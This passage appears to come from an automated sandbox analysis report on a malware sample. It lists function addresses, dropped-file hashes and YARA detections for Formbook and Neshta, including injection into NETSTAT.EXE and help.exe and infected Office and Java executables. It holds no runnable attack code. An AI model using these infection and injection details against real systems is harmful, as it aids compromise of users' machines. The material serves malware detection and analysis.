          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00ADD4667_2_00ADD466
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A425817_2_00A42581
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A2D5E07_2_00A2D5E0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE25DD7_2_00AE25DD
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A10D207_2_00A10D20
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE2D077_2_00AE2D07
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE1D557_2_00AE1D55
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE2EF77_2_00AE2EF7
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A36E307_2_00A36E30
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00ADD6167_2_00ADD616
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE1FF17_2_00AE1FF1
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AEDFCE7_2_00AEDFCE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E44AEF17_2_02E44AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E522AE17_2_02E522AE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E3FA2B17_2_02E3FA2B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E323E317_2_02E323E3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DBABD817_2_02DBABD8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E4DBD217_2_02E4DBD2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E403DA17_2_02E403DA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DBEBB017_2_02DBEBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DAAB4017_2_02DAAB40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E52B2817_2_02E52B28
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DAA30917_2_02DAA309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E528EC17_2_02E528EC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02D9B09017_2_02D9B090
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E520A817_2_02E520A8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DB20A017_2_02DB20A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E5E82417_2_02E5E824
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E4100217_2_02E41002
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DAA83017_2_02DAA830
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DA99BF17_2_02DA99BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02D8F90017_2_02D8F900
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DA412017_2_02DA4120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E52EF717_2_02E52EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DA6E3017_2_02DA6E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E4D61617_2_02E4D616
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E51FF117_2_02E51FF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E5DFCE17_2_02E5DFCE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E4449617_2_02E44496
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E4D46617_2_02E4D466
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02D9841F17_2_02D9841F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E525DD17_2_02E525DD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02D9D5E017_2_02D9D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DB258117_2_02DB2581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E42D8217_2_02E42D82
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E51D5517_2_02E51D55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E52D0717_2_02E52D07
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02D80D2017_2_02D80D20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_0236E1D717_2_0236E1D7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02359E3017_2_02359E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02359E2B17_2_02359E2B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02352FB017_2_02352FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02352D9017_2_02352D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02352D8717_2_02352D87
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A336023_2_036A3360
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036AAB4023_2_036AAB40
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0372CB4F23_2_0372CB4F
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03752B2823_2_03752B28
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036AA30923_2_036AA309
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0374231B23_2_0374231B
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036D8BE823_2_036D8BE8
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037323E323_2_037323E3
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0374DBD223_2_0374DBD2
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037403DA23_2_037403DA
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036BABD823_2_036BABD8
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036BEBB023_2_036BEBB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036B138B23_2_036B138B
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036AEB9A23_2_036AEB9A
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0372EB8A23_2_0372EB8A
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03745A4F23_2_03745A4F
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0373FA2B23_2_0373FA2B
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036AB23623_2_036AB236
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03744AEF23_2_03744AEF
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0374E2C523_2_0374E2C5
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037522AE23_2_037522AE
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037532A923_2_037532A9
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A412023_2_036A4120
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0368F90023_2_0368F900
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0369C1C023_2_0369C1C0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A99BF23_2_036A99BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A299023_2_036A2990
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0375E82423_2_0375E824
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036AA83023_2_036AA830
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0368680023_2_03686800
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0374100223_2_03741002
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036B701D23_2_036B701D
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037460F523_2_037460F5
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037528EC23_2_037528EC
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036B20A023_2_036B20A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037520A823_2_037520A8
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0369B09023_2_0369B090
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03751FF123_2_03751FF1
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037467E223_2_037467E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0375DFCE23_2_0375DFCE
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0370AE6023_2_0370AE60
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A6E3023_2_036A6E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0374D61623_2_0374D616
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A560023_2_036A5600
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03752EF723_2_03752EF7
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036B06C023_2_036B06C0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03731EB623_2_03731EB6
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03751D5523_2_03751D55
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A2D5023_2_036A2D50
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03680D2023_2_03680D20
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03752D0723_2_03752D07
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0369D5E023_2_0369D5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037525DD23_2_037525DD
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036B65A023_2_036B65A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036B258123_2_036B2581
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03742D8223_2_03742D82
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0374CC7723_2_0374CC77
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0374D46623_2_0374D466
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036AB47723_2_036AB477
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A243023_2_036A2430
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0369841F23_2_0369841F
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036B4CD423_2_036B4CD4
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0374449623_2_03744496
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E8E1D723_2_00E8E1D7
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E72D8723_2_00E72D87
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E72D9023_2_00E72D90
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E79E2B23_2_00E79E2B
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E79E3023_2_00E79E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E72FB023_2_00E72FB0
          Source: Joe Sandbox View Dropped File: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe 8FCB4C541BDDA7D5CDA8124B48BECBAFBAFE2D82116BD6356D16FF894E1D83AD
          Source: Joe Sandbox View Dropped File: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe 3D49D6B3360EB03FDD43A4C926213F8B348ABEDE3A5D8B7A4530BF8ED4AE1B72
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 02D8B150 appears 133 times
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: String function: 0041BDA0 appears 38 times
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: String function: 009CB150 appears 136 times
          Source: C:\Windows\SysWOW64\help.exe Code function: String function: 036DD08C appears 48 times
          Source: C:\Windows\SysWOW64\help.exe Code function: String function: 03715720 appears 85 times
          Source: C:\Windows\SysWOW64\help.exe Code function: String function: 0368B150 appears 177 times
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe Code function: String function: 00A1B150 appears 54 times
          Source: vi0EwpbUht.exe, 00000001.00000002.585454565.0000000002240000.00000002.00000001.sdmp Binary or memory string: originalfilename vs vi0EwpbUht.exe
          Source: vi0EwpbUht.exe, 00000001.00000002.585454565.0000000002240000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs vi0EwpbUht.exe
          Source: vi0EwpbUht.exe, 00000001.00000002.584995806.00000000021D0000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs vi0EwpbUht.exe
          Source: vi0EwpbUht.exe, 00000002.00000003.324725121.0000000003226000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs vi0EwpbUht.exe
          Source: vi0EwpbUht.exe, 00000002.00000002.336317174.0000000002190000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs vi0EwpbUht.exe
          Source: vi0EwpbUht.exe, 00000003.00000002.480933192.0000000002A20000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs vi0EwpbUht.exe
          Source: vi0EwpbUht.exe, 00000003.00000002.464510666.0000000000ABF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs vi0EwpbUht.exe
          Source: vi0EwpbUht.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: vi0EwpbUht.exe, type: SAMPLE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000003.395354644.00000000021C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_GIF_Anomalies date = 2020-07-02, author = Florian Roth, description = Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type, score = https://en.wikipedia.org/wiki/GIF
          Source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
